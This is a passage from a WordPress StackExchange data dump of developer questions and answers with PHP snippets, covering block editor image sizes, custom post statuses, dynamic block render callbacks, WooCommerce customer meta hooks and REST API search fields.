function wpse_375600( $editor_settings ) {
$editor_settings['imageSizes'][] = [
'slug' => 'banner-image',
'name' => 'Banner Image',
];
return $editor_settings;
}
```
And in addition to that the filter being specific to the block editor, your callback can also get access to the post being edited, which is the second parameter (`$post`) in the filter hook as you can see above. So you could for example filter the settings only for certain posts.
**Resources:**
* [The Latest Posts block on GitHub](https://github.com/WordPress/gutenberg/tree/master/packages/block-library/src/latest-posts)
* [The Block Editor's Data » `getSettings()`](https://developer.wordpress.org/block-editor/data/data-core-block-editor/#getSettings)
* [Editor Filters » Editor Settings](https://developer.wordpress.org/block-editor/developers/filters/editor-filters/#editor-settings) |
375,637 | <p>Finally I've solved the wildcard subdomain for my hosting. But now I'm facing another problem.</p>
<p>If you try <a href="https://randomname.minepi.hu" rel="nofollow noreferrer">https://randomname.minepi.hu</a> then it will redirect for the main domain and wordpress deleting the given data. If you try this link: <a href="https://randonname.minepi.hu/test/" rel="nofollow noreferrer">https://randonname.minepi.hu/test/</a> you can see its a simple php page and now the subdomain stays there, and I can processs the given info on the site.</p>
<p>Okay the SSL have to be setup somehow later, not sure how could I do that since I'm just using Easy SSL now, and I don't see wildcard subdomain options but thats a different tale. Right now I would be happy if Wordpress not deleting the subdomain from the URL.</p>
<p>Maybe its some edit needed in the MySQL tables, or are there any easier options?</p>
| [
{
"answer_id": 375601,
"author": "Paul",
"author_id": 195289,
"author_profile": "https://wordpress.stackexchange.com/users/195289",
"pm_score": 1,
"selected": false,
"text": "<p>it looks like you have to also pass your custom image thumbnail sizes to the filter <code>image_size_names_choose</code>. I tried it and this works for displaying custom images sizes as choices in the latest posts dropdown:</p>\n<pre><code>add_filter('image_size_names_choose', function( $sizes ){\n return array_merge( $sizes, [ 'banner-image' => 'banner image' ] );\n});\n</code></pre>\n<p>This blog explains a similar issue, so I tried his suggestion.\n<a href=\"https://talhasariyuerek.com/en/show-all-image-sizes-in-gutenberg-mediaupload-wordpress/\" rel=\"nofollow noreferrer\">https://talhasariyuerek.com/en/show-all-image-sizes-in-gutenberg-mediaupload-wordpress/</a></p>\n<p>And by the way, the Gutenberg component that controls that dropdown is <a href=\"https://github.com/WordPress/gutenberg/tree/master/packages/block-editor/src/components/image-size-control\" rel=\"nofollow noreferrer\">https://github.com/WordPress/gutenberg/tree/master/packages/block-editor/src/components/image-size-control</a></p>\n"
},
{
"answer_id": 375604,
"author": "Sally CJ",
"author_id": 137402,
"author_profile": "https://wordpress.stackexchange.com/users/137402",
"pm_score": 3,
"selected": true,
"text": "<p>The Latest Posts block uses (<code>wp.data.select( 'core/block-editor' ).getSettings()</code> to get) the image sizes in the editor settings which can be filtered via the <a href=\"https://developer.wordpress.org/reference/hooks/block_editor_settings/\" rel=\"nofollow noreferrer\"><code>block_editor_settings</code> hook</a> in PHP:</p>\n<blockquote>\n<p><code>apply_filters( 'block_editor_settings', array $editor_settings, WP_Post $post )</code></p>\n<p>Filters the settings to pass to the block editor.</p>\n</blockquote>\n<p>And the setting name used for the image sizes is <code>imageSizes</code>.</p>\n<p>So for example, to make the custom <code>banner-image</code> size be available in the featured image size dropdown (in the Latest Posts block's settings):</p>\n<pre class=\"lang-php prettyprint-override\"><code>add_filter( 'block_editor_settings', 'wpse_375600' );\nfunction wpse_375600( $editor_settings ) {\n $editor_settings['imageSizes'][] = [\n 'slug' => 'banner-image',\n 'name' => 'Banner Image',\n ];\n\n return $editor_settings;\n}\n</code></pre>\n<p>And in addition to that the filter being specific to the block editor, your callback can also get access to the post being edited, which is the second parameter (<code>$post</code>) in the filter hook as you can see above. So you could for example filter the settings only for certain posts.</p>\n<p><strong>Resources:</strong></p>\n<ul>\n<li><p><a href=\"https://github.com/WordPress/gutenberg/tree/master/packages/block-library/src/latest-posts\" rel=\"nofollow noreferrer\">The Latest Posts block on GitHub</a></p>\n</li>\n<li><p><a href=\"https://developer.wordpress.org/block-editor/data/data-core-block-editor/#getSettings\" rel=\"nofollow noreferrer\">The Block Editor's Data » <code>getSettings()</code></a></p>\n</li>\n<li><p><a href=\"https://developer.wordpress.org/block-editor/developers/filters/editor-filters/#editor-settings\" rel=\"nofollow noreferrer\">Editor Filters » Editor Settings</a></p>\n</li>\n</ul>\n"
}
] | 2020/09/29 | [
"https://wordpress.stackexchange.com/questions/375637",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/195329/"
] | Finally I've solved the wildcard subdomain for my hosting. But now I'm facing another problem.
If you try <https://randomname.minepi.hu> then it will redirect for the main domain and wordpress deleting the given data. If you try this link: <https://randonname.minepi.hu/test/> you can see its a simple php page and now the subdomain stays there, and I can processs the given info on the site.
Okay the SSL have to be setup somehow later, not sure how could I do that since I'm just using Easy SSL now, and I don't see wildcard subdomain options but thats a different tale. Right now I would be happy if Wordpress not deleting the subdomain from the URL.
Maybe its some edit needed in the MySQL tables, or are there any easier options? | The Latest Posts block uses (`wp.data.select( 'core/block-editor' ).getSettings()` to get) the image sizes in the editor settings which can be filtered via the [`block_editor_settings` hook](https://developer.wordpress.org/reference/hooks/block_editor_settings/) in PHP:
>
> `apply_filters( 'block_editor_settings', array $editor_settings, WP_Post $post )`
>
>
> Filters the settings to pass to the block editor.
>
>
>
And the setting name used for the image sizes is `imageSizes`.
So for example, to make the custom `banner-image` size be available in the featured image size dropdown (in the Latest Posts block's settings):
```php
add_filter( 'block_editor_settings', 'wpse_375600' );
function wpse_375600( $editor_settings ) {
$editor_settings['imageSizes'][] = [
'slug' => 'banner-image',
'name' => 'Banner Image',
];
return $editor_settings;
}
```
And in addition to that the filter being specific to the block editor, your callback can also get access to the post being edited, which is the second parameter (`$post`) in the filter hook as you can see above. So you could for example filter the settings only for certain posts.
**Resources:**
* [The Latest Posts block on GitHub](https://github.com/WordPress/gutenberg/tree/master/packages/block-library/src/latest-posts)
* [The Block Editor's Data » `getSettings()`](https://developer.wordpress.org/block-editor/data/data-core-block-editor/#getSettings)
* [Editor Filters » Editor Settings](https://developer.wordpress.org/block-editor/developers/filters/editor-filters/#editor-settings) |
375,639 | <p>I am making a plugin to upload records and I want to put the option to choose category, also I would like those categories to be the ones that are normally created with wordpress, but I don't know if can</p>
<p>How do I put the option to choose category in the form?</p>
| [
{
"answer_id": 375641,
"author": "ktscript",
"author_id": 194230,
"author_profile": "https://wordpress.stackexchange.com/users/194230",
"pm_score": -1,
"selected": false,
"text": "<p>you can try this code:</p>\n<pre><code>$parent_cat = get_query_var('cat');\nwp_list_categories("child_of=$parent_cat&show_count=1");\n</code></pre>\n<p>you will get a list of top-level categories at the output</p>\n<p>if you need an example of selecting a category, you can do this:</p>\n<pre><code>$args = array(\n 'taxonomy' => 'tags',\n 'parent' => 0, // get top level categories\n 'orderby' => 'name',\n 'order' => 'ASC',\n 'hierarchical' => 1,\n 'pad_counts' => 0\n);\n\n$categories = get_categories( $args );\n\necho '<select name="category_id">';\n\nforeach ( $categories as $category ){\n echo '<option value="'.$category->ID.'">'.$category->name.'</option>'; \n}\n\necho '</select>';\n</code></pre>\n<p>after submitting the form, you need to process the POST request:</p>\n<pre><code>wp_set_post_categories( $your_record_id, array( $_POST['category_id'] ), true);\n</code></pre>\n"
},
{
"answer_id": 375647,
"author": "Eduardo Escobar",
"author_id": 136130,
"author_profile": "https://wordpress.stackexchange.com/users/136130",
"pm_score": 1,
"selected": true,
"text": "<p>IDs are your friends. Get the category list using <a href=\"https://developer.wordpress.org/reference/functions/get_categories\" rel=\"nofollow noreferrer\">get_category</a> (i'm assuming we are talking about the in-built Wordpress "category" taxonomy, which slug is <em>category</em>).</p>\n<pre><code>$categories = get_categories( array(\n 'hide_empty' => false // This is optional\n) );\n</code></pre>\n<p>Use the obtained category list in the output of your <select> field:</p>\n<pre><code> <?php // get $selected_term_id from somewhere ?> \n <select name="category_id">\n <?php foreach( $categories as $category ) : ?>\n <?php $is_selected = $category->term_id == $selected_term_id ? 'selected' : ''; ?> \n <option value="<?php esc_attr_e( $category->term_id ); ?>" <?php echo $is_selected; ?>><?php esc_html_e( $category->cat_name ); ?></option>\n <?php endforeach; ?>\n </select>\n</code></pre>\n"
}
] | 2020/09/29 | [
"https://wordpress.stackexchange.com/questions/375639",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/139955/"
] | I am making a plugin to upload records and I want to put the option to choose category, also I would like those categories to be the ones that are normally created with wordpress, but I don't know if can
How do I put the option to choose category in the form? | IDs are your friends. Get the category list using [get\_category](https://developer.wordpress.org/reference/functions/get_categories) (i'm assuming we are talking about the in-built Wordpress "category" taxonomy, which slug is *category*).
```
$categories = get_categories( array(
'hide_empty' => false // This is optional
) );
```
Use the obtained category list in the output of your <select> field:
```
<?php // get $selected_term_id from somewhere ?>
<select name="category_id">
<?php foreach( $categories as $category ) : ?>
<?php $is_selected = $category->term_id == $selected_term_id ? 'selected' : ''; ?>
<option value="<?php esc_attr_e( $category->term_id ); ?>" <?php echo $is_selected; ?>><?php esc_html_e( $category->cat_name ); ?></option>
<?php endforeach; ?>
</select>
``` |
375,650 | <p>I am trying to register a new post type to hide post in searches but still allow for the post to be seen by url.</p>
<pre><code>function reg_ghost_status(){
register_post_status( 'ghosted', array(
'label' => 'Ghost Post',
'publicly_queryable' => false,
'exclude_from_search' => true,
'public' => true, //on false hides everywhere
'show_in_admin_all_list' => true,
'show_in_admin_status_list' => true,
) );
}
add_action( 'init', 'reg_ghost_status' );
</code></pre>
<p>I could not get this work and tried all sorts of combinations. It seems since it is 'public' it shows everywhere no matter what settings. So I than tried using the pre_set_query but I don't know how to use exclude instead of include by post_status.</p>
<pre><code>function sxcsexclude_ghost_from_search($query) {
if ( $query->is_single ) {
$query->set('perm', 'readable');
$query->set('post_status', array( 'publish', 'draft', 'ghosted', 'future' ));
return $query;
}
}
add_action( 'pre_get_posts', '11111exclude_ghost_from_search' );
</code></pre>
<p>Can someone tell me why the register_post_status is not working.</p>
<p>Thanks</p>
| [
{
"answer_id": 375664,
"author": "wrydere",
"author_id": 66722,
"author_profile": "https://wordpress.stackexchange.com/users/66722",
"pm_score": 1,
"selected": false,
"text": "<p>If it was me, I would probably just override the queries on the individual templates that you are trying to hide "ghosted" posts on. However, I can see how in some situations it would be better to override the main query.</p>\n<p>How about:</p>\n<pre><code>function public_query_published_only($query) {\n if ( !$query->is_single() && !current_user_can('manage_options') && !is_admin() ) {\n $query->set('post_status', array('publish') );\n return $query;\n }\n}\nadd_action( 'pre_get_posts', 'public_query_published_only' );\n</code></pre>\n<p>So: if the query is not for a single post, and the user isn't a logged-in user, and the query isn't from the admin interface, only show posts with a status of "publish". (Of course, you could also add any other statuses that you deem to be query-able.)</p>\n<p>Because there is not an exclusion filter for post status, this is the best I could think of without resorting to SQL.</p>\n"
},
{
"answer_id": 414015,
"author": "Ahmedhere",
"author_id": 180546,
"author_profile": "https://wordpress.stackexchange.com/users/180546",
"pm_score": 0,
"selected": false,
"text": "<p>This question asked long time ago, but here is the better solution:</p>\n<pre><code>add_action( 'posts_where', function( $where, $q ) {\n if( $q->is_search() ) {\n global $wpdb;\n\n $status_to_exclude = 'ghosted'; // Modify this to your needs!\n\n $where .= sprintf( \n " AND {$wpdb->posts}.post_status NOT IN ( '%s' ) ", \n $status_to_exclude \n );\n\n }\n return $where;\n}, 10, 2 );\n</code></pre>\n"
}
] | 2020/09/29 | [
"https://wordpress.stackexchange.com/questions/375650",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/192315/"
] | I am trying to register a new post type to hide post in searches but still allow for the post to be seen by url.
```
function reg_ghost_status(){
register_post_status( 'ghosted', array(
'label' => 'Ghost Post',
'publicly_queryable' => false,
'exclude_from_search' => true,
'public' => true, //on false hides everywhere
'show_in_admin_all_list' => true,
'show_in_admin_status_list' => true,
) );
}
add_action( 'init', 'reg_ghost_status' );
```
I could not get this work and tried all sorts of combinations. It seems since it is 'public' it shows everywhere no matter what settings. So I than tried using the pre\_set\_query but I don't know how to use exclude instead of include by post\_status.
```
function sxcsexclude_ghost_from_search($query) {
if ( $query->is_single ) {
$query->set('perm', 'readable');
$query->set('post_status', array( 'publish', 'draft', 'ghosted', 'future' ));
return $query;
}
}
add_action( 'pre_get_posts', '11111exclude_ghost_from_search' );
```
Can someone tell me why the register\_post\_status is not working.
Thanks | If it was me, I would probably just override the queries on the individual templates that you are trying to hide "ghosted" posts on. However, I can see how in some situations it would be better to override the main query.
How about:
```
function public_query_published_only($query) {
if ( !$query->is_single() && !current_user_can('manage_options') && !is_admin() ) {
$query->set('post_status', array('publish') );
return $query;
}
}
add_action( 'pre_get_posts', 'public_query_published_only' );
```
So: if the query is not for a single post, and the user isn't a logged-in user, and the query isn't from the admin interface, only show posts with a status of "publish". (Of course, you could also add any other statuses that you deem to be query-able.)
Because there is not an exclusion filter for post status, this is the best I could think of without resorting to SQL. |
375,682 | <p>I'm writing a new plugin, and one of the things it does is create a new dynamic block. I generally write my plugins based off of <a href="http://wppb.io" rel="nofollow noreferrer">WPPB</a>, which does things in an object-oriented way, and semantically separates admin functionality from public functionality.</p>
<p>I have the admin class successfully creating the edit side of the block. But for the "save" side, for a dynamic block, it makes semantic sense for the render function to be in the public class ... but (I think) it needs to get registered in the admin class (actually, now that I'm writing this, is there any harm to calling register_block_type more than once?).</p>
<p>I'm thinking there's more than one way to skin this cat, and I'm trying to figure out the "best", where "best" is making optimal use of both PHP OOP and WordPress builtin functionality, to maximize speed, minimize size, and provide clean, readable code.</p>
<p>Option 1: make sure the main plugin class instantiates the public class first, and then passes it to the admin class:</p>
<pre><code>class My_Plugin {
$my_public = new My_Public();
$my_admin = new My_Admin($my_public);
}
class My_Admin {
public function __construct($my_public) {
$this->my_public = $my_public;
}
register_block_type( 'my-plugin/my-block',
array(
'editor_script' => 'my_editor_function',
'render_callback' => array($this->my_public, 'my_save_function')
) );
}
class My_Public {
public function my_save_function() {
//do stuff to render the public side of the block
}
}
</code></pre>
<p>Option 2: do something with WordPress Actions and Hooks:</p>
<pre><code>class My_Admin {
register_block_type( 'my-plugin/my-block',
array(
'editor_script' => 'my-editor-function',
'render_callback' => 'render_front_end')
) );
public function render_front_end() {
do_action('my_plugin_render_action');
}
}
class My_Public {
public function my_save_function() {
//do stuff to render the public side of the block
}
add_action('my_plugin_render_action', 'my_save_function', 10);
}
</code></pre>
<p>Or, hypothetically, Option 3: if there's no problem calling the register function more than once:</p>
<pre><code>class My_Admin {
register_block_type( 'my-plugin/my-block',
array(
'editor_script' => 'my-editor-function',
) );
}
class My_Public {
register_block_type( 'my-plugin/my-block',
array(
'render_callback' => 'my_save_function'
) );
public function my_save_function() {
//do stuff to render the public side of the block
}
}
</code></pre>
<p>Is one of these preferable? Do all of these work? Is there a better way to do this?</p>
| [
{
"answer_id": 375685,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 3,
"selected": true,
"text": "<p>Option 1 is the solution, here's a smaller example:</p>\n<pre class=\"lang-php prettyprint-override\"><code>$obj = new Obj();\n....\nregister_block_type(\n 'my-plugin/my-block',\n [\n 'editor_script' => 'editor-script-handle',\n 'render_callback' => [ $obj, 'block_save_function' ]\n ]\n);\n</code></pre>\n<p>In that code <code>[ $obj, 'block_save_function' ]</code> is equivalent to <code>$obj->block_save_function(...</code>.</p>\n<p>The important thing to note, is that <code>render_callback</code>'s value is a PHP <code>callable</code> type. You need a reference to the object, and the name of the method to call. This is true of all callbacks, such as when you add an action or filter.</p>\n<p>Likewise, option 2 and 3 can be fixed by using the same syntax.</p>\n<p>To learn more about the different ways to create callables, see the PHP official documentation here <a href=\"https://www.php.net/manual/en/language.types.callable.php\" rel=\"nofollow noreferrer\">https://www.php.net/manual/en/language.types.callable.php</a></p>\n"
},
{
"answer_id": 386627,
"author": "Ludwig",
"author_id": 204877,
"author_profile": "https://wordpress.stackexchange.com/users/204877",
"pm_score": 2,
"selected": false,
"text": "<p>In PHP you can use an array to call methods (functions) within classes. The first part is the class name and the second the method. It is not necessary to instantiate that class and the class name can be a string as well. Even namespaces are working fine.</p>\n<p>So how to define the callback for the method <code>render</code> in the following code?</p>\n<pre class=\"lang-php prettyprint-override\"><code>namespace Any_Vendor\\My_Plugin;\n\nclass My_Block\n{\n public static function render($attributes) { ... }\n}\n</code></pre>\n<pre class=\"lang-php prettyprint-override\"><code>register_block_type(\n 'my-plugin/my-block',\n [\n 'render_callback' => [ \\Any_Vendor\\My_Plugin\\My_Block::class, 'render' ],\n ...\n ]\n);\n</code></pre>\n<p>Using a string <code>[ '\\Any_Vendor\\My_Plugin\\My_Block', 'render' ]</code> would do the job as well, but you should stick to the first example <code>[ \\Any_Vendor\\My_Plugin\\My_Block::class, 'render' ]</code> because the string variant is hard to be interpreted by IDEs and editors.</p>\n"
}
] | 2020/09/30 | [
"https://wordpress.stackexchange.com/questions/375682",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/194028/"
] | I'm writing a new plugin, and one of the things it does is create a new dynamic block. I generally write my plugins based off of [WPPB](http://wppb.io), which does things in an object-oriented way, and semantically separates admin functionality from public functionality.
I have the admin class successfully creating the edit side of the block. But for the "save" side, for a dynamic block, it makes semantic sense for the render function to be in the public class ... but (I think) it needs to get registered in the admin class (actually, now that I'm writing this, is there any harm to calling register\_block\_type more than once?).
I'm thinking there's more than one way to skin this cat, and I'm trying to figure out the "best", where "best" is making optimal use of both PHP OOP and WordPress builtin functionality, to maximize speed, minimize size, and provide clean, readable code.
Option 1: make sure the main plugin class instantiates the public class first, and then passes it to the admin class:
```
class My_Plugin {
$my_public = new My_Public();
$my_admin = new My_Admin($my_public);
}
class My_Admin {
public function __construct($my_public) {
$this->my_public = $my_public;
}
register_block_type( 'my-plugin/my-block',
array(
'editor_script' => 'my_editor_function',
'render_callback' => array($this->my_public, 'my_save_function')
) );
}
class My_Public {
public function my_save_function() {
//do stuff to render the public side of the block
}
}
```
Option 2: do something with WordPress Actions and Hooks:
```
class My_Admin {
register_block_type( 'my-plugin/my-block',
array(
'editor_script' => 'my-editor-function',
'render_callback' => 'render_front_end')
) );
public function render_front_end() {
do_action('my_plugin_render_action');
}
}
class My_Public {
public function my_save_function() {
//do stuff to render the public side of the block
}
add_action('my_plugin_render_action', 'my_save_function', 10);
}
```
Or, hypothetically, Option 3: if there's no problem calling the register function more than once:
```
class My_Admin {
register_block_type( 'my-plugin/my-block',
array(
'editor_script' => 'my-editor-function',
) );
}
class My_Public {
register_block_type( 'my-plugin/my-block',
array(
'render_callback' => 'my_save_function'
) );
public function my_save_function() {
//do stuff to render the public side of the block
}
}
```
Is one of these preferable? Do all of these work? Is there a better way to do this? | Option 1 is the solution, here's a smaller example:
```php
$obj = new Obj();
....
register_block_type(
'my-plugin/my-block',
[
'editor_script' => 'editor-script-handle',
'render_callback' => [ $obj, 'block_save_function' ]
]
);
```
In that code `[ $obj, 'block_save_function' ]` is equivalent to `$obj->block_save_function(...`.
The important thing to note, is that `render_callback`'s value is a PHP `callable` type. You need a reference to the object, and the name of the method to call. This is true of all callbacks, such as when you add an action or filter.
Likewise, option 2 and 3 can be fixed by using the same syntax.
To learn more about the different ways to create callables, see the PHP official documentation here <https://www.php.net/manual/en/language.types.callable.php> |
375,799 | <p>I am trying to get all user details (including WooCommerce meta data) in a function that is called with <code>user_register</code> and <code>profile_update</code> hooks. This is the simplified code:</p>
<pre><code>function get_all_user_data($user_id) {
$user_data = get_userdata($user_id);
$login = $user_data->user_login;
$b_firstname = get_user_meta($user_id, 'billing_first_name', true);
}
add_action('user_register','get_all_user_data');
add_action('profile_update','get_all_user_data');
</code></pre>
<p><strong>The behavior:</strong></p>
<ol>
<li>User is registered, I can access it's userdata (e.g. login) immediately</li>
<li>WooCommerce billing address is updated and saved, however I still only can access the $login variable, 'billing_first_name' meta is apparently still empty at this time</li>
<li>WooCommerce shipping address is updated and saved, after this I can access the billing information that were saved in previous step, but not the shipping data that was saved in current step</li>
</ol>
<p>The same goes for a scenario in which the user is registered during WooCommerce checkout, no WC data is accessible at that time yet.</p>
<p>PS: I have also tried the <code>woocommerce_after_save_address_validation</code> hook, but that seems to have the same behavior as the <code>profile_update</code> in my case.</p>
<p><strong>Edit:</strong> <code>edit_user_profile_update</code> doesn't work as well. Setting the action priority to a high number (executed later) doesn't help either. <code>insert_user_meta</code> filter works, but only returns native WP's user meta, not WooCommerce customer's meta.</p>
| [
{
"answer_id": 375980,
"author": "Lonk",
"author_id": 77848,
"author_profile": "https://wordpress.stackexchange.com/users/77848",
"pm_score": 1,
"selected": false,
"text": "<p>My solution would be this:</p>\n<pre><code>function get_all_user_data($user_id) {\n\n $user_data = get_userdata($user_id);\n\n $login = $user_data->user_login;\n\n $customer_array = new WC_Customer( $user_id );\n $customer = $customer_array->get_data();\n $billing_first_name = $customer[billing][first_name];\n $shipping_first_name = $customer[shipping][first_name];\n}\nadd_action('user_register','get_all_user_data');\nadd_action('profile_update','get_all_user_data');\n\n</code></pre>\n<p>The array setup for the Customer arrays [billing] and [shipping] is as so (you can just change my values and get different data or add more variables if you'd like):</p>\n<pre><code> [billing] => Array\n (\n [first_name] => John\n [last_name] => Doe\n [company] => \n [address_1] => 1338 Easy St\n [address_2] => \n [city] => Oakland\n [postcode] => 48094\n [country] => US\n [state] => CA\n [email] => [email protected]\n [phone] => 6167783456\n )\n\n [shipping] => Array\n (\n [first_name] => John\n [last_name] => Doe\n [company] => \n [address_1] => 1338 Easy St\n [address_2] => \n [city] => Oakland\n [postcode] => 48094\n [country] => US\n [state] => CA\n )\n</code></pre>\n"
},
{
"answer_id": 376315,
"author": "Kristián Filo",
"author_id": 138610,
"author_profile": "https://wordpress.stackexchange.com/users/138610",
"pm_score": 3,
"selected": true,
"text": "<p>I got it working. The key was the <code>woocommerce_update_customer</code> action. In the end my function was triggered only by these two actions:</p>\n<pre><code>add_action('user_register','get_all_user_data', 99);\nadd_action('woocommerce_update_customer','get_all_user_data', 99);\n</code></pre>\n<p>I don't need the <code>profile_update</code> because I don't need to track changes in default WP's user data. However it can be used along with woocommerce_update _customer, but keep in mind your function will be triggered twice.</p>\n"
}
] | 2020/10/02 | [
"https://wordpress.stackexchange.com/questions/375799",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/138610/"
] | I am trying to get all user details (including WooCommerce meta data) in a function that is called with `user_register` and `profile_update` hooks. This is the simplified code:
```
function get_all_user_data($user_id) {
$user_data = get_userdata($user_id);
$login = $user_data->user_login;
$b_firstname = get_user_meta($user_id, 'billing_first_name', true);
}
add_action('user_register','get_all_user_data');
add_action('profile_update','get_all_user_data');
```
**The behavior:**
1. User is registered, I can access it's userdata (e.g. login) immediately
2. WooCommerce billing address is updated and saved, however I still only can access the $login variable, 'billing\_first\_name' meta is apparently still empty at this time
3. WooCommerce shipping address is updated and saved, after this I can access the billing information that were saved in previous step, but not the shipping data that was saved in current step
The same goes for a scenario in which the user is registered during WooCommerce checkout, no WC data is accessible at that time yet.
PS: I have also tried the `woocommerce_after_save_address_validation` hook, but that seems to have the same behavior as the `profile_update` in my case.
**Edit:** `edit_user_profile_update` doesn't work as well. Setting the action priority to a high number (executed later) doesn't help either. `insert_user_meta` filter works, but only returns native WP's user meta, not WooCommerce customer's meta. | I got it working. The key was the `woocommerce_update_customer` action. In the end my function was triggered only by these two actions:
```
add_action('user_register','get_all_user_data', 99);
add_action('woocommerce_update_customer','get_all_user_data', 99);
```
I don't need the `profile_update` because I don't need to track changes in default WP's user data. However it can be used along with woocommerce\_update \_customer, but keep in mind your function will be triggered twice. |
375,880 | <p>when I activated the theme. it is only one page. the navbar links are Home #About #Services #Contact</p>
<p>the problem when I make template name on the frontpage</p>
<pre><code><?php
/* Template Name: front-page */
get_header(); ?>
</code></pre>
<p>then I created a page from the dashboard called Home</p>
<p>it added slug /home at the end of the url</p>
<p>so the website url differed because of this homepage template. it added the home slug the url. I need to remove /home slug. just want the same link without changing.</p>
<p>what should I do, please? to make template for homepage without changing the url of the website?</p>
<p>and many thanks in advance.</p>
| [
{
"answer_id": 375834,
"author": "Anarko",
"author_id": 195470,
"author_profile": "https://wordpress.stackexchange.com/users/195470",
"pm_score": 1,
"selected": false,
"text": "<p>Manually Fix Another Update in Process</p>\n<p>First you need to visit the cPanel dashboard of your WordPress hosting account. Under the database section, click on the phpMyAdmin icon.<br>\n<a href=\"https://i.stack.imgur.com/RL5DN.png\" rel=\"nofollow noreferrer\"><img src=\"https://i.stack.imgur.com/RL5DN.png\" alt=\"enter image description here\" /></a>\n<br></p>\n<p>Next you need to select your WordPress database in phpMyAdmin. This will show you all the tables inside your WordPress database. You need to click on the Browse button next to the WordPress options <strong>table (wp_options)</strong>.<br>\n<a href=\"https://i.stack.imgur.com/FLMPT.png\" rel=\"nofollow noreferrer\"><img src=\"https://i.stack.imgur.com/FLMPT.png\" alt=\"enter image description here\" /></a>\n<br>\nThis will show you all the rows inside the options table. You need to find the row with the option name ‘<strong>core_updater.lock</strong>’ and click on the delete button next to it.\n<br>\n<a href=\"https://i.stack.imgur.com/IALKe.png\" rel=\"nofollow noreferrer\"><img src=\"https://i.stack.imgur.com/IALKe.png\" alt=\"Delete core updater lock option\" /></a>\n<br>\nPhpMyAdmin will now delete the row from your WordPress database.</p>\n<p>You can switch back to your WordPress website and proceed with updating your WordPress website.</p>\n"
},
{
"answer_id": 378047,
"author": "Rene Hermenau",
"author_id": 129837,
"author_profile": "https://wordpress.stackexchange.com/users/129837",
"pm_score": 0,
"selected": false,
"text": "<p>@fuxia next time you can open a support request at <a href=\"https://wp-staging.com/support/\" rel=\"nofollow noreferrer\">https://wp-staging.com/support/</a></p>\n<p>The WP STAGING team will give you dedicated support even if you only use the free version and not the premium variant.</p>\n<p>I will take your feedback seriously and will check with the team to implement a function that prevents closing the browser without extra confirmation.</p>\n<p>Cheers,\nRené (lead developer of WP STAGING)</p>\n"
}
] | 2020/10/03 | [
"https://wordpress.stackexchange.com/questions/375880",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/188733/"
] | when I activated the theme. it is only one page. the navbar links are Home #About #Services #Contact
the problem when I make template name on the frontpage
```
<?php
/* Template Name: front-page */
get_header(); ?>
```
then I created a page from the dashboard called Home
it added slug /home at the end of the url
so the website url differed because of this homepage template. it added the home slug the url. I need to remove /home slug. just want the same link without changing.
what should I do, please? to make template for homepage without changing the url of the website?
and many thanks in advance. | Manually Fix Another Update in Process
First you need to visit the cPanel dashboard of your WordPress hosting account. Under the database section, click on the phpMyAdmin icon.
[](https://i.stack.imgur.com/RL5DN.png)
Next you need to select your WordPress database in phpMyAdmin. This will show you all the tables inside your WordPress database. You need to click on the Browse button next to the WordPress options **table (wp\_options)**.
[](https://i.stack.imgur.com/FLMPT.png)
This will show you all the rows inside the options table. You need to find the row with the option name ‘**core\_updater.lock**’ and click on the delete button next to it.
[](https://i.stack.imgur.com/IALKe.png)
PhpMyAdmin will now delete the row from your WordPress database.
You can switch back to your WordPress website and proceed with updating your WordPress website. |
376,081 | <p>I am trying to add the post (pages, posts) excerpt in the <code>wp-json/wp/v2/search</code> get endpoint but this endpoint seems to not take into account the <code>register_rest_field</code> method.</p>
<pre class="lang-php prettyprint-override"><code>add_action('rest_api_init', function() {
register_rest_field('post', 'excerpt', array(
'get_callback' => function ($post_arr) {
die(var_dump($post_arr));
return $post_arr['excerpt'];
},
));
register_rest_field('page', 'excerpt', array(
'get_callback' => function ($post_arr) {
die(var_dump($post_arr));
return $post_arr['excerpt'];
},
));
});
</code></pre>
<p>This causes <code>wp-json/wp/v2/pages</code> and <code>wp-json/wp/v2/posts</code> to die, but <code>wp-json/wp/v2/search</code> works perfectly, although it renders posts and pages.</p>
<p>Any idea how I can add my excerpt to the results of the <code>wp-json/wp/v2/search</code> route?</p>
| [
{
"answer_id": 376085,
"author": "Sally CJ",
"author_id": 137402,
"author_profile": "https://wordpress.stackexchange.com/users/137402",
"pm_score": 4,
"selected": true,
"text": "<p>For the search endpoint, the object type (the first parameter for <code>register_rest_field()</code>) is <code>search-result</code> and not the post type (e.g. <code>post</code>, <code>page</code>, etc.).</p>\n<p>So try with this, which worked for me:</p>\n<pre class=\"lang-php prettyprint-override\"><code>add_action( 'rest_api_init', function () {\n // Registers a REST field for the /wp/v2/search endpoint.\n register_rest_field( 'search-result', 'excerpt', array(\n 'get_callback' => function ( $post_arr ) {\n return $post_arr['excerpt'];\n },\n ) );\n} );\n</code></pre>\n"
},
{
"answer_id": 376985,
"author": "Ian Dunn",
"author_id": 3898,
"author_profile": "https://wordpress.stackexchange.com/users/3898",
"pm_score": 0,
"selected": false,
"text": "<blockquote>\n<p>Embeds only return fields that have the <code>embed</code> context. You can add embed to the context specified in the schema using the <code>"rest_{$post_type}_item_schema"</code> filter.</p>\n</blockquote>\n<p>-- <a href=\"https://core.trac.wordpress.org/ticket/51596\" rel=\"nofollow noreferrer\">https://core.trac.wordpress.org/ticket/51596</a></p>\n<p>Here's an example of that. Note that parent fields like <code>content</code> need to have the context added in order for child fields like <code>content.rendered</code> to show up.</p>\n<pre class=\"lang-php prettyprint-override\"><code>add_filter( 'rest_' . POST_TYPE . '_item_schema', function( $schema ) {\n $schema['properties']['content']['context'][] = 'embed';\n $schema['properties']['content']['properties']['rendered']['context'][] = 'embed';\n\n return $schema;\n} );\n</code></pre>\n<p>That feels a bit more "correct" to me than using <code>register_rest_field()</code>.</p>\n"
}
] | 2020/10/07 | [
"https://wordpress.stackexchange.com/questions/376081",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/97197/"
] | I am trying to add the post (pages, posts) excerpt in the `wp-json/wp/v2/search` get endpoint but this endpoint seems to not take into account the `register_rest_field` method.
```php
add_action('rest_api_init', function() {
register_rest_field('post', 'excerpt', array(
'get_callback' => function ($post_arr) {
